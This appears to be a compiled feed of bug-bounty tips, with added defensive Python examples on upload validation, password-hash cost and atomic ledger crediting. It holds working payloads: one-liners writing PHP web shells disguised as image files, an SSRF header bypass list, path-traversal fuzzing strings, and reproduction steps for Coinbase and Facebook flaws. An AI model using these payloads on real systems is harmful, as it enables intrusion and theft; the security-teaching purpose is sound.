Includes all the important wordlists used while bug hunting
https://github.com/YaS5in3/Bug-Bounty-Wordlists
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
https://chat.openai.com ✅
1/ Just had a 🤯 thought:
ChatGPT is like a money-launderer for information.
2/ ChatGPT is a super cool AI language model that can generate human-like text for tons of use-cases! It's trained on tons of public information.
3/ Money laundering, on the other hand, is the process of disguising the proceeds of illegal activities as legitimate funds. It's often done by mixing the illegal funds with legitimate transactions.
4/ Both ChatGPT and money laundering create deniability. With ChatGPT, it's hard to tell where an idea came from because it can generate text that's similar to what other people have written.
5/ And with money laundering, it's hard to trace the origin of funds because they are mixed with legitimate transactions.
6/ Crazy stuff. Fin.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Easy P1 🫥
1: Collect all the JS files by using the developer tool on Mozilla
2: Run the Link Finder tool on the JS files you got from the dev tool, or use the JS Miner tool
3: Now manually check the JS files for sensitive keywords
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
If you need to quickly make RCE code from bash disguised as an image for an LFI/malicious upload.
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
Also:
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
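A defender's view of the files above, as an added example that is not part of the original post: each file starts with a valid image magic number, so an upload filter that inspects only the first bytes accepts it. The function names and sample bytes below are constructed for illustration; the PHP body is a harmless stand-in.

```python
import struct

# Harmless stand-in for the PHP body used in the post (constructed sample data).
PHP_BODY = b"<?php /* placeholder */ ?>."
# The four magic-number prefixes from the post, each followed by PHP text.
DISGUISED = {
    "shell.jpg": b"\xff\xd8\xff\xe0" + PHP_BODY,
    "shell.png": b"\x89PNG" + PHP_BODY,
    "shell.gif": b"GIF8" + PHP_BODY,
    "shell.bmp": b"BM" + PHP_BODY,
}

def magic_only_check(data: bytes) -> bool:
    """Weak filter: trusts the first bytes of the upload."""
    return data.startswith((b"\xff\xd8\xff", b"\x89PNG", b"GIF8", b"BM"))

def structural_check(data: bytes) -> bool:
    """Validate header fields that follow the magic number."""
    if data.startswith(b"\xff\xd8\xff"):
        # JPEG: the first segment carries a big-endian length that must fit
        # inside the file, and the stream ends with the EOI marker.
        if len(data) < 6:
            return False
        (seg_len,) = struct.unpack(">H", data[4:6])
        return seg_len >= 2 and 4 + seg_len <= len(data) and data.endswith(b"\xff\xd9")
    if data.startswith(b"\x89PNG"):
        # PNG: full 8-byte signature, then a 13-byte IHDR chunk comes first.
        return data[:16] == b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
    if data.startswith(b"GIF8"):
        # GIF: only two version strings exist.
        return data[:6] in (b"GIF87a", b"GIF89a")
    if data.startswith(b"BM"):
        # BMP: little-endian file size at offset 2 must match the real size.
        return len(data) >= 14 and struct.unpack("<I", data[2:6])[0] == len(data)
    return False

def contains_php_tag(data: bytes) -> bool:
    """Heuristic content scan for PHP open tags anywhere in the file."""
    lowered = data.lower()
    return b"<?php" in lowered or b"<?=" in lowered

def accept_upload(data: bytes) -> bool:
    """Accept only files that pass both the structural and content checks."""
    return structural_check(data) and not contains_php_tag(data)

if __name__ == "__main__":
    for name, blob in DISGUISED.items():
        print(name, "magic-only:", magic_only_check(blob), "hardened:", accept_upload(blob))
```

The content scan is a heuristic; re-encoding the image server-side and storing uploads under a server-chosen name in a location where scripts are never executed are the sturdier controls.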
You can follow these steps:
• It is also important to test the website carefully and systematically, as some XSS vulnerabilities may be well-hidden and difficult to find.
• If you are unsure about how to proceed, you may want to seek help from an experienced security professional.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Bug : Facebook Group Members Disclosure
Organization : Facebook or Meta
Bounty : $4500
Read Full Bug Reports👇
Intro : A non-member can determine whether someone is a member of a private group via the CometHovercardQueryRendererQuery GraphQL mutation.
How ? : Doc_ID: 4997502340291357. By changing the actorID to the victim’s actorID and the groupID to the group we want to test: if the response shows “WeakEntityReference”, then he/she is not a member of the group.
However, if it shows “StrongEntityReference”, then he/she is a member of the group.
Step 1.
From a non-member’s account, send this request, replacing the actorID variable with that of the victim and the groupID variable with that of the group you want to test against.
Step 2.
If you get “StrongEntityReference” in the response, he/she is a member of the group. However, if you get “WeakEntityReference” in the response, he/she is not a member of the group. Using this, you can find out whether someone is a member of the private group or not.
POC of above👆bug:
https://drive.google.com/file/d/1XAitPW8Evnoh11N8yQqkAxKkyX3zpFSK/view
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Bug Bounty Hint
It's possible to cause application-level DoS when the password field on the login/registration page doesn't have length limits.
The greater the length, the more power is required to hash a password.
However, not all hash functions are vulnerable to this attack.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
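Why password length matters for hashing cost, as an added example that is not part of the original post: two toy stretching constructions (illustrative only, not real KDFs) are compared by counting the bytes fed to SHA-256, followed by a login-side length cap. All names and the 1024-byte limit are assumptions made for this sketch.

```python
import hashlib

MAX_PASSWORD_BYTES = 1024  # assumed policy limit, not a value from the post
SALT = b"constructed-salt"  # constructed sample salt

class CountingSHA256:
    """SHA-256 wrapper that records how many input bytes it processed."""
    total_bytes = 0

    @classmethod
    def digest(cls, data: bytes) -> bytes:
        cls.total_bytes += len(data)
        return hashlib.sha256(data).digest()

def naive_stretch(password: bytes, salt: bytes, rounds: int) -> bytes:
    """Feeds the full password into every round: work grows with its length."""
    state = CountingSHA256.digest(salt + password)
    for _ in range(rounds):
        state = CountingSHA256.digest(state + password)
    return state

def prehashed_stretch(password: bytes, salt: bytes, rounds: int) -> bytes:
    """Reduces the password to a digest once, the way HMAC treats a key longer
    than its block size, so each round handles a fixed-size input."""
    key = CountingSHA256.digest(password)
    state = CountingSHA256.digest(salt + key)
    for _ in range(rounds):
        state = CountingSHA256.digest(state + key)
    return state

def work(stretch, password: bytes, rounds: int = 100) -> int:
    """Return the number of bytes hashed for one password verification."""
    CountingSHA256.total_bytes = 0
    stretch(password, SALT, rounds)
    return CountingSHA256.total_bytes

def hash_login_password(password: str) -> bytes:
    """Reject oversized input before any hashing work is spent on it."""
    raw = password.encode("utf-8")
    if len(raw) > MAX_PASSWORD_BYTES:
        raise ValueError("password too long")
    return hashlib.pbkdf2_hmac("sha256", raw, SALT, 100_000)

if __name__ == "__main__":
    for size in (8, 100_000):
        pw = b"a" * size
        print(size, "naive:", work(naive_stretch, pw), "prehashed:", work(prehashed_stretch, pw))
```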
Best SSRF Bypass List 🔥
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Find hidden params in javascript files
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Bug Bounty Report ✅
• Bug : Ethereum account balance manipulation
• Bug Type : Business Logic Errors
• Organization : Coinbase
• Bounty : $10000
• Technology : Blockchain or Web 3
Read This Report : 👇
📌 Summary :
➡️ By using a smart contract to distribute ether over a set of wallets you can manipulate the account balance of your Coinbase account.
➡️ If 1 of the internal transactions in the smart contract fails, all transactions before that will be reversed.
➡️ But on Coinbase these transactions were not reversed, meaning someone could add as much ether to their balance as they want.
When looking at the Coinbase wallet address after this transaction, you will see that it is empty, but checking your Coinbase wallet will show your funds.
📌 Steps To Reproduce:
• Set up a smart contract with a few valid Coinbase wallets and 1 final faulty wallet
(for example, a smart contract that always throws an exception when receiving funds)
• Transfer appropriate funds to smart contract.
• Execute smart contract adding the set amount of ether to the Coinbase wallets without ever actually leaving the smart contract wallet because the complete transaction fails at the last wallet.
• Repeat until you have more than enough Ethereum in your Coinbase wallet.
• Cash out, transfer to off site wallet
How It Could Be Fixed :
➡️ The issue was fixed by changing the contract handling logic.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
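A simplified model of the mismatch described in this report, as an added example that is not part of the original post and not Coinbase's code: on-chain execution is atomic, while an exchange-side ledger that credits every observed internal transfer ends up showing funds that never arrived. The crediting logic, names and balances are assumptions constructed for illustration.

```python
from collections import defaultdict

class Revert(Exception):
    """Raised when a recipient refuses funds, aborting the whole transaction."""

def execute_batch(chain, sender, transfers, rejecting):
    """Run all internal transfers atomically.

    Returns (succeeded, trace); trace lists the internal transfers that ran
    before any failure. On failure the chain state is rolled back.
    """
    snapshot = dict(chain)
    trace = []
    try:
        for recipient, amount in transfers:
            if recipient in rejecting:
                raise Revert(recipient)
            chain[sender] -= amount
            chain[recipient] = chain.get(recipient, 0) + amount
            trace.append((recipient, amount))
    except Revert:
        chain.clear()
        chain.update(snapshot)
        return False, trace
    return True, trace

def credit_from_trace(ledger, trace, succeeded):
    """Flawed (assumed) logic: credits every observed internal transfer."""
    for recipient, amount in trace:
        ledger[recipient] += amount

def credit_if_final(ledger, trace, succeeded):
    """Corrected logic: credits only when the enclosing transaction succeeded."""
    if succeeded:
        credit_from_trace(ledger, trace, succeeded)

def simulate(credit_fn):
    """Return (tx_succeeded, on-chain balance, ledger balance) for wallet_a."""
    chain = {"contract": 10, "wallet_a": 0, "wallet_b": 0}  # constructed balances
    ledger = defaultdict(int)                               # exchange-side view
    transfers = [("wallet_a", 3), ("wallet_b", 3), ("faulty", 3)]
    ok, trace = execute_batch(chain, "contract", transfers, rejecting={"faulty"})
    credit_fn(ledger, trace, ok)
    return ok, chain["wallet_a"], ledger["wallet_a"]

if __name__ == "__main__":
    print("flawed :", simulate(credit_from_trace))
    print("checked:", simulate(credit_if_final))
```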
How to Find XSS Like a Pro 🫥
To find XSS (Cross-Site Scripting) bugs, you can use a combination of manual testing and automated tools.
Some steps you can follow to find XSS:
➡️ Identify potential entry points for XSS attacks, such as input fields in web forms, query parameters in URLs, or file uploads.
➡️ Use a web application scanner to test these entry points for XSS vulnerabilities.
These scanners can automatically scan your web application and identify potential vulnerabilities, including XSS.
➡️ Manually review your website's code for any places where user-supplied input is not properly sanitized or validated.
For example, look for places where the website includes user input in the page without properly encoding it first.
➡️ Test the website by trying to inject various types of malicious input, such as JavaScript code, into different parts of the website.
For example, try entering JavaScript code into forms, URL parameters, and other inputs to see if the website is vulnerable to XSS attacks.
➡️ If you find any potential XSS vulnerabilities, verify them by attempting to exploit them.
This will help you confirm that the issue is real and that it needs to be fixed.
Once you have identified and verified any XSS vulnerabilities, work with your development team to fix the issues and prevent them from happening again in the future.
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Android Security materials and resources For Pentesters and Bug Hunters
https://github.com/saeidshirazi/awesome-android-security?s=09
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
A collection of awesome tools used by Web hackers :)
https://github.com/hahwul/WebHackersWeapons
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Secondary context fuzzing:
/..%2f
/..;/
/../
/..%00/
/..%0d/
/..%5c
/..\
/..%ff/
/%2e%2e%2f
/.%2e/
/%3f (?)
/%26 (&)
/%23 (#)
via https://samcurry.net/hacking-starbucks/
100 million😲 sbux accounts disclosure
see also: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Bug Bounty Hint
How to turn Self-XSS into Reflected/Stored XSS
• Cache poisoning
• Copy+Paste trick using IFrame
• Cookie poisoning using auto login
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Bug Bounty Hint
Soon you will be able to use regular expression searches in GitHub repositories (in addition to basic dorking). You can join the waitlist @ cs.github.com
Meanwhile, you can use grep.app
👉 www.github.com/l4yton/RegHex
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
How to get Started into Bug Bounty ?
⚙ Basics:
1. Networking basics
2. Linux basics
3. Computer flow
4. Learning 1 at 1
⚙ How things work?
1. Website
2. Apps
3. Servers
4. Networks
5. Technologies
⚙ What Tools?
1. Proxy Tools
2. Tools installation
3. Virtual Box
4. Browser Usage
5. Linux Commands
⚙ Labs
1. Portswigger
2. Hacker101
3. CTFs
4. HackThisSite
5. Pentesterlab
⚙ Platforms
1. Bugcrowd
2. HackerOne
3. Intigriti
4. YesWeHack and more
#bugbounty #bugbountytips #cybersecurity #infosec #hacking
Tips for finding hardcoded credentials
Whenever you are searching for hardcoded credentials, don't forget to read "jquery.js" files as well. Sometimes you might find 3rd party hardcoded credentials
#bugbountytips #hacking #infosec
CSP-bypass techniques ☘️
https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
#bugbounty #bugbountytips